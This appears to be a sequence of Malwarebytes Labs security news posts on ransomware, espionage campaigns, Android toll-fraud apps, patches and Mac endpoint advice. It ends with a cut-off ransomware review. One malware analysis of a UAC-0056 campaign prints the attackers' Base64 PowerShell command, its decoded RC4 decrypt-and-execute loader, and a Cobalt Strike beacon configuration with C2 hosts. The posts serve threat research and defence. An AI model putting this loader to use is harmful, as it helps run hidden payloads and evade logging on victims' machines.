It’s not been a great couple of months for gaming giant Bandai Namco. The name behind smash hit titles like Elden Ring and Dark Souls has endured a long run of cheats and hacks.

Hacking concerns led to Remote Code Execution issues, and multiplayer features in Souls titles were disabled for months. In March, in-game cheats in Elden Ring meant players had to turn off multiplayer to avoid new attacks.

We’re now in July and Bandai Namco has experienced its most severe issue yet, confirming it has fallen victim to a severe ransomware attack.

Eurogamer published a Bandai Namco statement, which reads as follows:

On 3rd July, 2022, Bandai Namco Holdings Inc. confirmed that it experienced an unauthorised access by third party to the internal systems of several Group companies in Asian regions (excluding Japan).

“After we confirmed the unauthorised access, we have taken measures such as blocking access to the servers to prevent the damage from spreading. In addition, there is a possibility that customer information related to the Toys and Hobby Business in Asian regions (excluding Japan) was included in the servers and PCs, and we are currently identifying the status about existence of leakage, scope of the damage, and investigating the cause.

“We will continue to investigate the cause of this incident and will disclose the investigation results as appropriate. We will also work with external organizations to strengthen security throughout the Group and take measures to prevent recurrence.

Double threat

While triple threat attacks are becoming increasingly popular, double threat (locking up data and then threatening to make it public if the ransom isn’t paid) are still big business. What we have here is a classic double threat, being run by a group with no qualms about following through on its promises.

In the tweet above, the screenshot refers to the compromise as “data soon”. The fear is that data is going to be leaked at some point in the near future. There is currently no word how much data has been grabbed, or what the ransomware authors are asking as payment.

Whether the data is related to employees, third parties, or even customers, we simply don’t know. Games publishers and developers are also host to significant amounts of confidential data for unreleased and unannounced games. This is an additional angle to consider. Would attackers value secret game IP over user data? Possibly.

The bad news carousel

This lands at a really bad time for Bandai Namco. It’s not so long ago that the Dark Souls multiplayer servers were in the process of being switched back on. This could well throw a large ransomware shaped spanner into the works for those plans.

There has to be concern over the considerable skillet of the BlackCat attackers, considering some of its likely past exploits. BlackCat stands accused of attacks on some of Europe’s largest ports back in February of this year. January saw data published belonging to a luxury fashion brand, and it wasn’t so long ago that it was publishing stolen data related to a luxury spa and resort located in the US.

This is one group which will absolutely carry out its double threat extortion threats. BlackCat is also ramping up its typical ransom amount, currently weighing in at around $2.5m. It remains to be seen how Bandai Namco handles this situation. Unfortunately for the publisher and their customers, the ransomware authors are firmly in the driving seat.

The post Elden Ring maker Bandai Namco hit by ransomware and data leaks appeared first on Malwarebytes Labs.

According to analyses of several cybersecurity firms and CERT (Computer Emergency Response Team) Ukraine (CERT-UA), the state-sponsored threat actor group Tonto Team, which has been linked to China-backed cyber operations, is ramping up its spying campaign against Russian government agencies. 

The campaign, which involves an email, a Word document file in RTF (Rich Text File) format, and a backdoor payload, starts off with socially engineering recipients to convince them to open a malformed attachment, triggering the execution of an MS Office exploit, particularly in the Equation Editor.

According to SentinelOne, the RTF file masquerades as a government advisory or security warning to agencies and infrastructure providers of potential attacks.

The fake advisory is written in Russian. Below is the Google-translated text in English:

Dear colleagues!

In addition, we remind you that recently there have been more cases of attempts to steal logins / passwords for access of employees of the Minsitry to official mail and the Service Portal.

Attackers on behalf of representatives of the Department of the Ministry of Foreign Affairs, government and other organizations send letters to e-mail addresses, in which they convince you to familiarize yourself with various documents and information.

Under no circumstances do not enter your service login / password in such cases.

Please note that the documents must be attached to the letter and opened from the body of the letter.

Compliance with these rules will allow you to maintain the confidentiality of not only your data, but also the data of other employees of the Ministry.

The Tonto Team used Royal Road (sometimes called “8.t”) to create the malicious RTF file. First analyzed by nao_sec, Royal Road is a document builder that gives threat actors the ability to embed malicious code within RTF files, aiding actors in compromising target systems.

The exploit is triggered upon opening the file, and the malware payload, Bisonal, is dropped. Bisonal, a tool many Chinese threat actors use, is a RAT (remote access Trojan). Apart from Chinese APTs (Advanced Persistent Threats), no other threat actor has used Bisonal.

The Tonto Team, an APT group that has been around almost as long as Bisonal, has many aliases: Karma Panda, Bronze Huntley, CactusPete, and Earth Akhlut. The group is known for targeting Asian nations (South Korea, Taiwan, and Japan) and Russia. So, this isn’t the first time China has been in the case of the former Soviet state. Rather, this is about a notable increase in targeting activity against Russia.

“What we’re seeing here is a potential Chinese government increase in intelligence collection requirements from inside Russia,” SentinelOne Senior Threat Researcher Tom Hegel told Dark Reading in an interview. “Perhaps an increased prioritization or expansion of resources assigned to such tasking.”

China is prioritizing its espionage campaign against Russia due to the ongoing Russian invasion of Ukraine. And while Chinese officials see themselves with Russia as “comprehensive strategic partners of coordination”, their diplomatic relations have strengthened through the years, mainly to suppress the expansion of Western alliances.

What China is doing is “simply China looking out for itself in uncertain times,” Hegel is also quoted saying. “Like any well-resourced nation, they seek to support their own agenda through cyber, and the state of affairs in Russia may be adjusting just what they prioritize.”

Chinese hacking groups have been using Royal Road and Bisonal for years, which says a lot. Its longevity points to the shared use of resources among these groups, making attribution very difficult. The repeated use of these tools through the years also suggests that campaigns against targeted nations have been successful, which gives us an idea of the state of security of these countries.

“The fact that these toolkits evolve and continue to operate really speaks to how well they’re resourced, and the state of the defense side,” Hegel told CyberScoop in a separate interview. “Nothing can really stop them from continuing to use this. It’s still successful in many cases, as we see here. You look at the exploits they’re using in these documents, they’re years old exploits. They’re popping people that are out of date by quite a few years.”

The post China’s Tonto Team increases espionage activities against Russia appeared first on Malwarebytes Labs.

Security researcher Maxime Ingrao has found a new variant of Android/Trojan.Spy.Joker which he’s dubbed Autolycos. Malware in this family secretly subscribes users to premium services. The researcher noted that the eight applications that contained this malware had racked up a total of over 3 million downloads.

Toll fraud malware

Toll fraud malware is a subcategory of billing fraud in which malicious applications subscribe users to premium services without their knowledge or consent. At the moment, toll fraud malware—also known as fleeceware—is one of the most prevalent types of Android malware. And not only does the number of infections keep going up, so does the sophistication of the malware.

Joker

Android/Trojan.Spy.Joker was the first major family that specialized in this field. It was first found in the Play Store in 2017. Joker is capable of clicking on online ads, and asks for SMS permissions during installation so it can access One Time Passwords (OTPs) to secretly approve payments. The user will never know that they have been subscribed to some service online until they check their bank statements or phone invoice.

Detection

Google uses the name Bread for the Joker malware family. In January, 2020, Google Play Protect detected and removed 1,700 unique Bread apps from the Play Store. By using as little code as possible and thoroughly hiding it, Joker generates a very discreet footprint which makes it hard to detect. But SMS and toll fraud generally require some basic functionality like disabling WiFi which needs one of a handful of APIs. Since Joker expects security researchers to look for those APIs, it uses a wide variety of techniques to mask the usage of them.

Slow response

The small footprint and masked usage of APIs must make it hard to find malicious apps among the multitude of apps that can be found in the Google Play Store. But that doesn’t explain why it took Google over a year to remove the eight apps reported by Maxime Ingrao. He reported the apps in June, 2021, and the last two were removed on July 13, 2022. It’s possible they would still be available if the researcher hadn’t gone public because he said he got tired of waiting.

Autolycos

As mentioned earlier, the malware is still undergoing development. What is new about this type is that it no longer requires a WebView. WebViews are exactly what the name indicates—a small view to a piece of Web content. A WebView can be a tiny part of the app screen, a whole page, or anything in between. Not requiring a WebView greatly reduces the chances that the user of an affected device notices something fishy is going on. Autolycos avoids WebView by executing URLs on a remote browser and then including the result in HTTP requests.

Malicious apps

BleepingComputer posted the list of malicious apps found by Maxime Ingrao, which users may still have installed:

• Vlog Star Video Editor (com.vlog.star.video.editor) – 1 million downloads
• Creative 3D Launcher (app.launcher.creative3d) – 1 million downloads
• Wow Beauty Camera (com.wowbeauty.camera) – 100,000 downloads
• Gif Emoji Keyboard (com.gif.emoji.keyboard) – 100,000 downloads
• Freeglow Camera 1.0.0 (com.glow.camera.open) – 5,000 downloads
• Coco Camera v1.1 (com.toomore.cool.camera) –  1,000 downloads
• Funny Camera by KellyTech –  500,000 downloads
• Razer Keyboard & Theme by rxcheldiolola – 50,000 downloads

Pradeo researchers have also identified four new malicious applications that embed the Joker malware:

• Smart SMS Messages 50.000+ installs
• Blood Pressure Monitor 10.000+ installs
• Voice Languages Translator 10.000+ installs
• Quick Test SMS 10.000+ installs

How to avoid toll fraud malware

Users that have any of the listed apps installed are advised to remove them as soon as possible. To avoid getting infected and duped by toll fraud malware there are a few countermeasures you can take:

• Keep Play Protect active.
• Pay attention to apps asking for permissions, in this case especially SMS permissions.
• Minimize the number of apps you install, however useful they may seem. The Autolycos operators created numerous advertising campaigns on social media.
• Do not rely on user reviews alone, since the malware authors use bots to maintain a good user rating.

Also, always keep an eye on your background internet data, battery consumption, phone invoices, and bank statements, just in case. The sooner you stop it, the smaller the damages.

The post New variant of Android SpyJoker malware removed from Play Store after 3 million+ installs appeared first on Malwarebytes Labs.

Stuxnet‘s attack on Iran’s uranium enrichment facilities manifested fears of cyberattacks leaking into the real world. What once was theory is now upon us.

Two weeks ago, multiple Iranian steel facilities experienced a cyberattack that might have been pulled off by what many cybersecurity experts in the field believe is “a professional and tightly regulated team of state-sponsored military hackers, who may even be obliged to carry out risk assessments before they launch an operation.”

The group who claimed responsibility for the attack goes by the nom de hack Predatory Sparrow.

The victim organizations are the Khouzestan Steel Company (KSC), Mobarakeh Steel Company (MSC), and Hormozgan Steel Company (HOSCO).

Some say Predatory Sparrow’s name is a play on “Charming Kitten”, the name of the notorious Iranian APT (advanced persistent threat) group. Although Predatory Sparrow has its own social media accounts, these are not searchable under the English nom but under its Persian equivalent, Gonjeshke Darande.

The attackers caused the foundry to spew hot molten steel and fire onto the factory floor, but not until workers had already cleared the area, unbeknownst of what was about to happen. The timing of the group’s attack is deliberate.

A video captured during one of these attacks was shared on its social platforms as proof. It already has 200,000 views.

“Today, 27/06/2022, we, ‘Gonjeshke Darande’, carried out cyberattacks against Iran’s steel industry which affiliated [sic] with the IRGC and the Basij,” a caption within the video reads. “These companies are subject to international sanctions and continue their operations despite the restrictions.”

These cyberattacks, being carried out carefully so to protect innocent individuals, are in response to the aggression of the Islamic Republic.

The public office of the Iranian National Cyberspace Center confirmed the attacks, blaming the incidents on “foreign enemies.” The outcome triggered a temporary shutdown of facilities. The public office also claimed, “Security systems quickly took action to contain and repel the effects.”

According to sources close to the two organizations affected by the attack, the only reason severe damage wasn’t done to the production line was that they were switched off at night due to power supply restrictions. The attack “is understood” to have occurred between midnight and 6AM, Tehran time. Systems affected by the attack are the production and security systems.

At this point, no one knows whether Predatory Sparrow is a state-sponsored group. Is it just merely a group of hacktivists out to punish corporations they see are crossing the line?

“If this does turn out to be a state sponsored cyber-attack causing physical – or in the war studies jargon ‘kinetic’ damage – this could be hugely significant,” Emily Taylor, editor of the Cyber Policy Journal, told the BBC.

Ersin Cahmutoglu, a cybersecurity researcher from ADEO Cyber Security Services, also has a theory. “If this cyberattack is state-sponsored then of course Israel is the prime suspect. Iran and Israel are in a cyber-war, and officially both states acknowledge this.”

“Both states mutually organise cyberattacks through their intelligence services and everything has escalated since 2020 when retaliation came from Israel after Iran launched a failed cyberattack on Israeli water infrastructure systems and attempted to interfere with the chlorine level.”

UK-based Iranian activist and independent cyberespionage investigator Nariman Gharib also shared his thoughts: “If Israel is behind these attacks, I think they are showing that they can do real damage rather than just disrupting a service. It shows how things can quickly escalate.”

Last week, Predatory Sparrow leaked “top secret documents and tens of thousands of emails”, along with “trading practices” from the steel makers it attacked.

The post Predatory Sparrow massively disrupts steel factories while keeping workers safe appeared first on Malwarebytes Labs.

If you’re one of the 50% of small and medium-sized businesses (SMBs) that use Mac devices today, chances are your IT and security teams have a ton of Mac endpoints to monitor. 

Securing that many endpoints can get really complex, really fast, especially when you consider that the common wisdom that Macs don’t get malware simply isn’t true: in fact, the number of malware detections on Mac jumped 200% year-on-year in 2021. 

And it’s not just malware you have to worry about with your Mac endpoints. 

Phishing attacks, vulnerability exploits, DDoS attacks, and much more threaten your company’s Macs at any time — and if any of them are successful, it could cost your business millions in lost productivity and information theft. 

Needless to say, these are a lot of different threats to deal with when it comes to Mac endpoint security. But Thomas Reed, Director of Mac & Mobile at Malwarebytes, is here to remind us of a few simple things we can do to make our Mac endpoints more secure. 

In this post, we break down three of Reed’s best practices for endpoint security for Mac. 

1. Update frequently

As in the Windows world, one of your top priorities needs to be keeping your Macs up to date — and by now we should all understand why. Just consider the fact that 60% of companies say breaches could have been avoided if they had patched known vulnerabilities. 

Tracking and patching vulnerabilities on macOS, however, is a little more difficult to do than on Windows. 

While Microsoft regularly advertises its security updates with its Patch Tuesdays,  Apple slips in patches on an ad-hoc basis — meaning MacOS admins need to put in a little more legwork to keep their devices up-to-date.

To ensure that you know about the latest updates for your Mac endpoints, there are two things you should do.

1. Sign up for Apple’s public security notifications and announcements mailing list. You’ll get an email anytime Apple releases a patch for macOS.
2. Regularly check Apple’s list of security updates and patches. It provides patch names, patch information, affected devices, and release dates.

Additionally, if you’re like most businesses and find that having no common view of assets is causing you major delays in patching, you should consider a vulnerability management solution that gives you instant visibility into potential vulnerabilities across your macOS environment.

2. Use a DNS filter to stop web-based attacks

Since Macs have a much smaller amount of “traditional” malware attacking them compared to Windows, you might think your endpoints are in the clear of cyberattacks. 

Not so. 

Instead of file-based malware, a lot of Mac users get attacked with adware and PUPs that are typically delivered through a number of web-based scams. These threats can throw advertisements up on your screen and slow your computer down, among other things.

OK, that sounds annoying. But surely a few advertisements aren’t too big a threat to your Mac endpoint security, right? Not quite, says Thomas Reed.

“Some of the adware out there is more sophisticated than most of the malware that we see for Mac,” Reed says. “It can do all kinds of stuff, like sending all your network traffic through a proxy or changing system settings to be less secure.”

Reed also mentions that a lot of adware and PUPs are part of the payload of scam sites that direct you to some kind of installer that you download — and so having some sort of web-based protection is vital. That’s where DNS filtering comes in.

“The source of all of these kinds of attacks is through the web, and DNS filtering can help with that by blocking some of those sites,” Reed says.

DNS filtering blocks connections to malicious web servers attempting to deliver malware payloads, so any business interested in Mac endpoint security should have it. Learn more about the ways DNS filtering can save your business from cyberattacks.

3. Don’t rely on Mac AV – use EDR 

Since 2009, Apple has included a built-in antivirus (AV) technology called XProtect on all Macs — and while it’s fairly good, there are a lot of threats that it doesn’t detect (that a third-party would).

“You can’t rely on the built-in antivirus that’s in Mac OS to do the job,” Reed says. “You really need to have something else on top of that.”

Even so, let’s be overly generous and say XProtect and your third-party AV detects and removes every Mac malware threat. Throw in the fact that traditional AVs can’t prevent sophisticated threats such as file-based malware, and you just may be left wondering what you can do to best protect your Macs from damaging endpoint attacks.

Endpoint detection and response (EDR) is the answer. 

EDR gives you a real-time “birds-eye view” of all of your Mac endpoints, so whenever something happens outside the norm, you isolate an endpoint, quarantine the threat, or remediate. This stands in stark contrast to more reactive signature-based solutions (like AVs) that allow malware to execute before working.

A key feature of EDR is its threat hunting capabilities. Read our Threat Hunting Made Easy eBook to learn how to save hours every month on threat investigation and response.

Prevent your Mac endpoints from online threats 

With everything from security vulnerabilities to malware threatening your company’s Macs at all times, Mac endpoint security is high-up on the list of priorities for macOS admins. In this post, we explained how macOS admins can stay on top of their patching game and why having a DNS filter and EDR are so essential for protecting Mac endpoints from a variety of threats.

Want to learn more about what simple and effective Mac endpoint protection looks like in action? Watch the demonstration of Malwarebytes Endpoint Detection and Response (EDR)!

The post Endpoint security for Mac: 3 best practices appeared first on Malwarebytes Labs.

It’s time to triage a lot of patching again. Microsoft’s July Patch Tuesday includes an actively exploited local privilege escalation vulnerability in the Windows Client/Server Runtime Subsystem (CSRSS). This vulnerability immediately made it to the Cybersecurity & Infrastructure Security Agency (CISA) list of known to be exploited in the wild list that are due for patching by August 2, 2022.

Microsoft

In total the Microsoft updates include fixes for 84 vulnerabilities. Four of these vulnerabilities are labelled as “Critical” since they are remote code execution (RCE) vulnerabilities.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that ware assigned to the four Critical vulnerabilities:

CVE-2022-22029: Windows Network File System (NFS) RCE vulnerability. This vulnerability is not exploitable in NFSV4.1. Prior to updating your version of Windows that protects against this vulnerability, you can mitigate an attack by disabling NFSV3, but this may adversely affect your ecosystem and should only be used as a temporary mitigation.

CVE-2022-22039: Another Windows Network File System (NFS) RCE vulnerability. It’s possible to exploit this vulnerability over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger an RCE.

CVE-2022-22038: Remote Procedure Call Runtime RCE vulnerability. Successful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.

CVE-2022-30221: Windows Graphics Component RCE vulnerability. An attacker would have to convince a targeted user to connect to a malicious RDP server. On connecting, the malicious server could execute code on the victim’s system in the context of the targeted user.

Azure Site Recovery

A huge part of the patches consist of 32 vulnerabilities in the Azure Site Recovery suite that could have allowed attackers to gain elevated privileges or perform remote code execution. Azure Site Recovery is an integrated disaster recovery service for Azure that helps ensure business continuity by keeping business apps and workloads running during outages.

According to Microsoft, SQL injection vulnerabilities caused most of the privilege escalation bugs in Azure Site Recovery.

CVE-2022-22047

The vulnerability that is known to be exploited in the wild is an elevation of privilege (EoP) vulnerability. An attacker who successfully exploited this vulnerability could gain SYSTEM privileges.

This type of vulnerability usually comes into play once an attacker has gained an initial foothold. They can then use this vulnerability to gain more permissions and expand their access to the compromised system.

The vulnerability is described as a Windows CSRSS Elevation of Privilege vulnerability. CSRSS is the Windows component that provides the user mode side of the Win32 subsystem. CSRSS is critical for a system’s operation and is mainly responsible for Win32 console handling and GUI shutdown.

This type of vulnerability are often chained together with others in macros, which makes the decision to roll back Office Macro blocking incomprehensible, even if it is only temporary.

Other vendors

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

Adobe released security updates for Acrobat, Character Animator, Photoshop,  Reader, and RoboHelp.

Cisco released critical updates for Cisco Expressway Series, Cisco TelePresence Video Communication Server, Cisco Email Security Appliance, Cisco Secure Email and Web Manager, Cisco Small Business RV110W, RV130, RV130W, and RV215W routers, and several other security updates.

Citrix released hotfixes to address a problem that may affect Citrix Hypervisor and Citrix XenServer under some circumstances.

Google released Android’s July security updates including 3 labelled as “Critical”.

SAP released its July 2022 Patch Day bulletin with 20 new Security Notes.

VMWare released security updates.

Stay safe, everyone!

The post Update now—July Patch Tuesday patches include fix for exploited zero-day appeared first on Malwarebytes Labs.

WhatsApp boss Will Cathcart is warning users of the popular messaging app to be on their guard after the WhatsApp Security Team discovered bogus apps packing a hidden punch in the form of malware.

Outside the safety of the walled garden

App stores do whatever they can to try and prevent bogus programs making it onto the storefront. While the majority of apps on legitimate stores are likely safe, rogues do get through. To avoid the hassle of dodging safety checks, malware authors host their infected files elsewhere. If they can draw device owners outside the relative safety of a storefront, they have more scope for infecting a mobile.

Sure enough:

There’s no detailed rundown of what the fake WhatsApp versions were getting up to on devices. What Cathcart does say is that these programs promised new features, but were specifically designed to steal personal information stored on victim’s phones.

Google Play Protect on Android now detects and disables previously downloaded versions of the fake WhatsApp apps, and the Google Play store shouldn’t experience any threat from these apps.

This is great news for those inside the walled garden, but what about those sitting outside?

(Un)official store safety

Depending on which version of Android you run, your settings and options available likely differ from model to model. However, in settings there’s usually an option which asks if you wish to download or install files from unknown sources.

What this means is “Do you want to install apps from outside the Google Play store”. This isn’t quite as nefarious as it sounds. Mobile networks and other organisations often offer downloadable software as part of their phone contracts. However, these app downloads may be offered outside of the Play Store. This is where the unknown source option comes into play.

A lot of the time, downloading these files outside of the store isn’t needed. The apps offered directly from organisations can be found on the Play Store anyway, in identical format. So it’s best to only download apps from the Play Store if at all possible.

WhatsApp: accept no imitations

WhatsApp recommends you only download the app from official stores. You can find links for both Android and iPhone on the official download page. WhatsApp has been known to hand users temporary bans if it finds evidence of people using unsupported versions on their devices. If you’re using a listed unsupported app, which is an altered version of the original, you’ll receive a temporary ban for that too.

It seems that the safest and most straightforward course of action is to avoid unofficial downloads, and follow WhatsApp’s advice for responsible app use.

The post WhatsApp warns users: Fake versions of WhatsApp are trying to steal your personal info appeared first on Malwarebytes Labs.

This blog was authored by Roberto Santos and Hossein Jazi

The Malwarebytes Threat Intelligence team recently reviewed a series of cyber attacks against Ukraine that we attribute with high confidence to UAC-0056 (AKA UNC2589, TA471). This threat group has repeatedly targeted the government entities in Ukraine via phishing campaigns following the same common tactics, techniques and procedures (TTPs).

Lures are based on important matters related to the ongoing war and humanitarian disaster happening in Ukraine. We have been closely monitoring this threat actor and noticed changes in their macro-based documents as well as their final payloads.

In this blog, we will connect the dots between different decoy samples that we and others such as Ukraine CERT have observed. We will also share indicators for a previously undocumented campaign performed by the same threat actor at the end of June.

Different themes, same techniques

Since the publication of our blog post There’s a Go Elephant in the room, we have tracked several new samples as can be seen in the timeline below:

Let’s dig further into those relationships. UA-CERT has attributed the document named “Information on the availability of vacancies and their staffing.xls” to UAC-0056. This file looked familiar to us and for good reason because the macro is nearly identical to the document we analyzed in our initial blog:

In the most recent attack reported by UA-CERT (Humanitarian catastrophe of Ukraine since February 24, 2022.xls) we see an almost identical macro to the one used in another decoy document called Help Ukraine.xls:

The Help Ukraine lure, to our knowledge, has never been publicly documented before:

We were able to identify 7 different samples with that theme, including one (258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0) that has some similarities with a previous attack:

Also, in the past we have found comments regarding to a domain named ExcelVBA[.]ru. This document was contacting a suspiciously similar domain named excel-vba[.]ru.

Among victims, we find gov.ua emails being targeted. One of the texts used as email body in the last campaign was written in Ukrainian and translates to:

On February 24, 2022, the army of the terrorist state – the Russian Federation, intervened on the territory of Ukraine. In order to counter the propaganda of the Russian government, the State Department of Statistics at the Office of the President of Ukraine prepared a consolidated report on the dead citizens of Ukraine, on the citizens of Ukraine who were left without a home, on the citizens of Ukraine who lost their jobs, on the number of destroyed homes, on the number of destroyed businesses as a result of an act of aggression . This report shows all the data broken down by regions of Ukraine. Familiarize yourself and familiarize your colleagues with the real state of affairs. Glory to Ukraine!

Translation of original email sent to victims

We will focus our analysis on these 3 newer templates. Exact names and paths are from 024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1 (Information on the availability of vacancies and their staffing.xls). The analysis is still valid for the others, while minor changes exist between samples.

write.bin

The document will download an executable file named write.bin. Other attacks following the same scheme used different names for this file, including Office.exe, baseupd.exe and DataSource.exe. The file is slightly obfuscated, and performs the following actions:

Establishing persistence

After some antidebug tricks, the registry key HKCUSoftwareMicrosoftWindowsCurrentVersionRunCheck License is used to establish persistence. HKCUSoftwareMicrosoftWindowsCurrentVersionRunUpdate Checker, is checked first because that was the key used by previous versions of the malware.

Dropping next stage

Next step is dropping a file in C:ProgramDataTRYxaEbX.  This file will be used later.

The payload will execute the following powershell Base64 encoded command:

JABBADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFQAUgBZAHgAYQBFAGIAWAAiACkAOwAKACQAQgAxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUAcwAoACIAQwBtAEEASgBuAGcAdgBkAEQAbQBpAFQAagBMAHgATgAiACkAOwAKACQAQQA9AHsAJABXACwAJABZAD0AJABBAHIAZwBzADsAJABYAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAFoAPQAoACQAWgArACQAWABbACQAXwBdACsAJABZAFsAJABfACUAJABZAC4ATABlAG4AZwB0AGgAXQApACUAMgA1ADYAOwAkAFgAWwAkAF8AXQAsACQAWABbACQAWgBdAD0AJABYAFsAJABaAF0ALAAkAFgAWwAkAF8AXQB9ADsAJABXAHwAJQB7ACQAVQA9ACgAJABVACsAMQApACUAMgA1ADYAOwAkAFYAPQAoACQAVgArACQAWABbACQAVQBdACkAJQAyADUANgA7ACQAWABbACQAVQBdACwAJABYAFsAJABWAF0APQAkAFgAWwAkAFYAXQAsACQAWABbACQAVQBdADsAJABfAC0AYgB4AG8AcgAkAFgAWwAoACQAWABbACQAVQBdACsAJABYAFsAJABWAF0AKQAlADIANQA2AF0AfQB9ADsACgAkAEMAIAA9ACAAKAAmACAAJABBACAAJABBADEAIAAkAEIAMQApADsACgAkAEUAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAEMALAAwACwAJABDAC4ATABlAG4AZwB0AGgAKQA7AAoAJABFACAAPQAgACQARQAgAC0AUwBwAGwAaQB0ACAAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQA7AAoAZgBvAHIAZQBhAGMAaAAoACQARQBFACAAaQBuACAAJABFACkAewBpAGUAeAAgACQAKAAkAEUARQArACIAOwAiACkAOwB9ADsA

The chunk before is Base64 encoded; which decodes to:

$A1 = [System.IO.File]::ReadAllBytes("C:ProgramDataTRYxaEbX");

$A={$W,$Y=$Args;$X=0..255;0..255|%{$Z=($Z+$X[$_]+$Y[$_%$Y.Length])%256;$X[$_],$X[$Z]=$X[$Z],$X[$_]};$W|%{$U=($U+1)%256;$V=($V+$X[$U])%256;$X[$U],$X[$V]=$X[$V],$X[$U];$_-bxor$X[($X[$U]+$X[$V])%256]}};

$C = (& $A $A1 $B1);

$E = (New-Object -TypeName System.Text.UTF8Encoding).GetString($C,0,$C.Length);

$E = $E -Split [Environment]::NewLine;

foreach($EE in $E){iex $($EE+";");};

In short the file dropped in C:ProgramDataTRYxaEbX will be decrypted using CmAJngvdDmiTjLxN as key using the RC4 algorithm. This next PowerShell script will look like:

Here we can see some of the actions that will be taken:

• Disable script logging
• Disable Module Logging
• Disable Transcription
• Disable AMSI protection

After this step, another Base64 payload is decoded and executed:

Cobalt Strike payload deployed

As it can be seen, the main functionality provided by this second PowerShell file is to inject shellcode. This shellcode can be 32 or 64 bit, and is a Cobalt Strike beacon with the following configuration:

BeaconType                    – HTTPS

Port                              – 443

SleepTime                       – 30000

PublicKey_MD5              – defb5d95ce99e1ebbf421a1a38d9cb64

C2Server                         – skreatortemp.site,/s/08u1XdxChhMrLYdTasfnOMQpbsLkpq3o/field-keywords/

UserAgent                       – Mozilla/5.0_Frsg_stredf_o21_rutyyyrui_type (Windows NT 10.0; Win64; x64; Trident/7.0; D-M1-200309AC;D-M1-MSSP1; rv:11.0) like Gecko_10984gap

HttpPostUri                    – /nBz07hg5l3C9wuWVCGV-5xHHu1amjf76F2A8i/avp/amznussraps/

Watermark                      – 1580103824

By having a Cobalt Strike instance running on the victim’s machine, it is now fully compromised.

Attacker probes the sandbox

At the time of writing, malicious C&C servers seem to be down. However, on July 5 we saw active servers and successful connections to our test environment. The attackers actively sent reconnaissance commands to the machine, listing the content of several folders.

We were able to decode the network communications using Didier Steven’s excellent collection of Cobalt Strike tools.

We consider these actions preliminary moves to check whether the machine is a viable target or not before following up with other actions.

Attribution to UAC-0056

Based on recent attacks reported by CERT UA, as well as the similarities indicated at the beginning of the blog, we can attribute this attack with high confidence to UAC-0056.

Signatures contained in the Cobalt Strike beacons (watermark 1580103824 and public key defb5d95ce99e1ebbf421a1a38d9cb64), may be used to connect the attack to other groups. For instance, the public key should be unique among deployments, according to the CobaltStrike documentation.

However, it is important to note that in that case we cannot simply rely on a public key to attribute the sample we analyzed in this report. In fact, these signatures have been attributed to many different groups. Our assessment is that the group used a leaked version of Cobalt Strike and used the same private key as others, making attribution harder.

Malwarebytes users were protected against this campaign thanks to our Anti-Exploit layer.

IOCs

Malicious Excel documents (Help Ukraine template)

fe3bc87b433e51e0713d80e379a61916ceb6007648b0fde1c44491ba44dc1cb3
c9675483ab362bc656a9f682928b6a0c3ff60a274ade3ceabac332069480605a
1b95186ecc081911c3a80f278e4ed34ee9ef3a46f5cf1ae8573ac3a4c69df532
258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0
e663bb4d9506e7c09bcf7b764d31b61d8f7dbae0b64dd4ef4e9d282e1909d386
ecd2bb648a9ad28069c1ec4c0da546507797fdf0243e9e5eece581bf702675ff
eac9a4d9b63a0ca68194eae433d6b2e9a4531b60b82faf218b8dd4b69cec09df

Malicious Excel documents (Humanitarian template)

024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1
14736be09a7652d206cd6ab35375116ec4fad499bb1b47567e4fd56dcfcd22ea
474a0f0bb5b17a1bb024e08a0bb46277ba03392ee95766870c981658c4c2300d

Payloads

0709a8f18c8436deea0b57deab55afbcea17657cb0186cbf0f6fcbb551661470
aadd8c7c248915c5da49c976f24aeb98ccc426fb31d1d6913519694a7bb9351a
fb2a9dcfcf41c493fb7348ff867bb3cad9962a04c9dfd5b1afa115f7ff737346
501d4741a0aa8784e9feeb9f960f259c09cbceccb206f355209c851b7f094eff

Cobalt Strike beacon and payloads

136.144.41[.]177
syriahr[.]eu/s/Xnk75JwUcIebkrmENtufIiiKEmoqBN/field-keywords/
syriahr[.]eu/nzXlLVas-VALvDh9lopkC/avp/amznussraps/
skreatortemp[.]site
imolaoggi[.]eu

The post Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign appeared first on Malwarebytes Labs.

Ransomware has given security professionals a headache for the better part of a decade. Fast forward to 2022, and the headache has become a migraine—not just for IT teams but business owners, employees, and customers as well. Over the last three months, ransomware gangs have increased the pressure by multiplying in number and unleashing targeted attacks on vulnerable industries, with disruptions to business operations, million-dollar ransom demands, data exfiltration, and extortion.

The supply chain, already stretched to a breaking point, suffered additional misfortunes across multiple industries, from agriculture and manufacturing to technology and utilities. Governments, nonprofits, and schools—some forced to close their doors—didn’t escape unscathed. And the carnage was not confined to US borders, though it was by far the most affected country. Germany, the UK, and Italy also registered high ransomware tallies.

